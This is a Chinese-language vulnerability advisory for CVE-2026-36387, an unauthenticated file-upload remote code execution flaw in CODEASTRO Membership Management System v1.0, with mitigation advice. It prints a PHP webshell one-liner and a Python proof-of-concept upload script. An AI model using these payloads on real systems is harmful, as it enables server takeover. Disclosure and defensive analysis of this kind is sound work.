IPBUF安全漏洞报告
English
CVE-2026-36387 CVSS 6.5 中危

CVE-2026-36387 CODEASTRO会员管理系统远程代码执行漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36387
漏洞类型
远程代码执行
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
CODEASTRO Membership Management System

相关标签

远程代码执行文件上传RCECODEASTROWeb安全

漏洞概述

CODEASTRO Membership Management System v1.0版本的/add_members.php接口存在远程代码执行漏洞。由于系统在文件上传功能中缺乏必要的安全清理机制,未经身份验证的攻击者可以利用此漏洞上传恶意文件,进而在目标服务器上执行任意代码,导致系统安全性完全受损。

技术细节

该漏洞的根本原因在于CODEASTRO系统在处理/add_members.php的文件上传请求时,未对用户上传的文件进行严格的安全校验。攻击者无需登录即可访问该接口。通过构造包含恶意PHP代码的文件(如Webshell),并修改HTTP请求中的Content-Type头,攻击者可以欺骗服务器接收并保存该文件。由于系统未对上传文件的扩展名进行白名单过滤,也未对文件内容进行特征检测,攻击者可以轻松绕过防护。一旦文件被上传至Web目录,攻击者通过浏览器直接访问该文件路径,Web服务器解析器将执行其中的恶意代码,导致服务器被完全控制,并可进一步横向移动。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是CODEASTRO Membership Management System v1.0,并定位到/add_members.php文件上传接口。
STEP 2
武器化
攻击者创建一个包含恶意PHP代码的文件(例如<?php system($_GET['cmd']); ?>),用于远程命令执行。
STEP 3
交付
攻击者向/add_members.php发送HTTP POST请求,将恶意文件伪装成合法文件进行上传。
STEP 4
利用
由于服务器未正确清理文件,恶意文件被保存到Web目录。攻击者通过浏览器访问该文件URL,触发服务器执行恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target.com/add_members.php" # Path to the malicious PHP file (webshell) file_path = "shell.php" # Prepare the payload # The vulnerability allows uploading files without proper sanitization files = { 'file': (file_path, open(file_path, 'rb'), 'application/octet-stream') } data = { 'submit': 'Submit' # Adjust based on actual form parameters } try: response = requests.post(url, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully.") print("[+] Check the upload directory to access the shell.") else: print("[-] Upload failed.") except Exception as e: print(f"Error: {e}")

影响范围

CODEASTRO Membership Management System v1.0

防御指南

临时缓解措施
建议管理员暂时禁用会员添加模块的文件上传功能,或在Web服务器配置层面(如Nginx/Apache配置文件)禁止上传目录(如/uploads/)的PHP脚本执行权限,同时部署Web应用防火墙(WAF)拦截恶意文件上传请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。